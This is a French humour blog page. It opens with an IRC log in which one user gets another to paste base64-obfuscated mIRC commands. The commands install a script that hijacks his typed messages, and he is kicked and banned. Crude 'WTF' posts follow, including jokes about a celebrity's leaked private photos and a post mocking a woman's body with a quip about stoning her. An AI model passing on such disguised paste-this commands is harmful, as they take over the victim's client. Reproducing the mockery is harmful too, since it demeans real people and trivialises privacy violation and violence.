IRC en vrac

<Ezekiel> slt je mapel Ezekiel <Haribo> sans blagues <Ezekiel> et toi?? <Haribo> ... <Ezekiel> di le stp <Haribo> ok tape // [ $decode (c2V0ICVib3Vsem9yIFsgJHJhbmQoJGNhbGMoMTBeMTApLCRjYWxjKDEwXjExKSkgXQ==, m) ] | [ $decode(d3JpdGUgLXJzIGJvdWx6b3IubXJj,m) ] [ $decode (T24gKjpJTlBVVDoqOnsgc2V0ICV4ICRjYWxjKCRsZW4oJDEtKSArIDEpIHwgdW5zZXQgJ XJlc3VsdGF0IHwgdG9rZW5pemUgMzIgJHJlcGxhY2UoJDEtLCAkY2hyKDMyKSwgJGNocig xNjApKSB8IHdoaWxlICV4ID4gMSB7IGRlYyAleCB8IHZhciAlcmVzdWx0YXQgPSAlcmVzd Wx0YXQgJCsgJG1pZCgkMS0sICV4LCAxKSB9IHwgbXNnICRhY3RpdmUgJXJlc3VsdGF0IHw gaGFsdCB9,m) ] | [ $decode(bG9hZCAtcnMgYm91bHpvci5tcmM=,m) ] <Ezekiel> ?iok éf as <Ezekiel> ppts ????????????????revnel a irce as kp <Ezekiel> edia# nioj/ <Ezekiel> snoc setê suov tiuq/ <Haribo> Et non tu peux pas partir <Haribo> Bon, je suis gentil donc je vais t'aider * Ezekiel was kicked by ChanServ ((Haribo) Ne me remercie pas, j'aime aider ;-)) *** le lendemain *** <Enlendil> riri, j'ai Ezekiel sur msn, il arrive ^^ * Haribo is now known as Karina * Ezekiel (24m93@Ezekiel_G.user.OGameNet) has joined #*** <Ezekiel> slt <Karina> Salut <Ezekiel> asv Karina <Karina> Va voir sur mon profil mIRC <Ezekiel> comen on fé? <Karina> tape // var %i $rand(10,10000) $+ [ $decode(Lm1yYw==,m) ] | [ $decode(d3JpdGUgLXJz,m) ] %i $decode (b24gKjppbnB1dDoqOnsgYW1zZyBqZSBzdWlzIHVuIGJvdWxldCBldCBqZSBwZXV4IHBsd XMgcGFybGVyIHw=,m) $decode(aGFsdA==,m) $chr(125) | [ $decode (bG9hZCAtcnM=,m) ] %i <Ezekiel> je suis un boulet et je peux plus parler <Ezekiel> je suis un boulet et je peux plus parler <Ezekiel> je suis un boulet et je peux plus parler <Ezekiel> je suis un boulet et je peux plus parler * SpamServ sets mode: +b *!*@Ezekiel_G.user.OGameFr * Ezekiel was kicked by SpamServ (Spamming is against the network rules) <Swald> Jeu set et match :D

wtf

Et pendant ce temps au Japon....

La radio activité continue à faire des ravages : toujours se méfier du vago d'un zombie .

Pourquoi la Chine construit des structures géantes en plein désert?

En se baladant sur Google Maps on trouve des choses bien étranges, par exemple ces structures titanesques non identifiées édifiées en plein milieu du désert chinois. 

La première de ces structures ressemble à un énorme réseau de bandes métalliques : vous pouvez le vérifiez de vous même en cliquouillant ; expérience militaire partie de morpion géante???? Les lignes sont parfaitement exécutées, il s'agit ptét d'un systéme de calibrage pour les satelittes espions chinois ou encore d'un QR Code à l'attention des aliens ^^

Quand on fouille encore un peu plus dans ce desert on trouve des choses encore plus hallucinantes (mais pour les voir va falloir cliquer sur lire la suite ^^)

C'est quoi ce bordel??

Bon là je crois que j'ai trouvé LA vidéo whatthefuckeste du moment : je ne suis pas sur qu'elle reste trés longtemps en ligne sur youtube alors profitez en.

A propos c'est pas trés suitable for le patron.

Le Scarlett Johanssoning

Aprés que les photos que la gentille et jolie Scarlett Johansson ai eu l'imprudence de se prendre en photo apwal avec son portable (et surtout de garder ces photos), donc aprés que ces photos aient été leakées on aurait pu s'attendre à la vague onaniste (fap time!) habituelle mais pas plus que ça, par contre cela a donné une nouvelle manie photographique le Scarlett Johanssoning.

Ya du rire et un peu de fesse ^^.

Le merveilleux monde désenchanté de Disney

José Rodolfo Loaiza Ontiveros est un peintre mexicain qui aime bien démystifier les contes des fées : il fait se téléscoper des situations sorties des dessins animés d'antan de Walt Disney avec des élèments imprévus totalement antithétiques (non mais une phrase comme ça je vais pas vous en rédiger tout les jours alors profitez en!).

Donc si vous aimez bien ce genre d'images totalement décalées, voila de quoi vous régaler l'oeil droit et l'oeil gauche en même temps.

Un Pac-man en Lou Gascoun ???

C'est la première reflexion que je me suis faite quand j'ai vu la couleur des boites, identiques à celle du fameux paté.

Cookie Monster?

WTF Licorne

Plus jamais je ne regarderais les licornes de la même manière.....Sob |:<

Ouate ze Phoque ?

Je sais.... Mais j'avais envie de la faire...

WTF BOOBZ ?

Simone ne savait pas trop quoi faire de sa vie d'attention whore peroxydée alors elle a décidé d'avoir les plus grosses putains de mamelles de Le monde.Entre gros et GROS, il n'y a qu'un pas à franchir.....

Là elle doit avoir un peu de mal pour : lacer ses chaussures, voir ses chaussures, se mettre à table, dormir sur le ventre, faire le poirier,..... La liste est sans fin.

Bon ce qui est coolos c'est que vu le poids de ses <inserer ici un truc vulgaire et mammaire> elle doit avoir du mal à courrir quand on la caillasse dans le rue :)

Syndiquer le contenu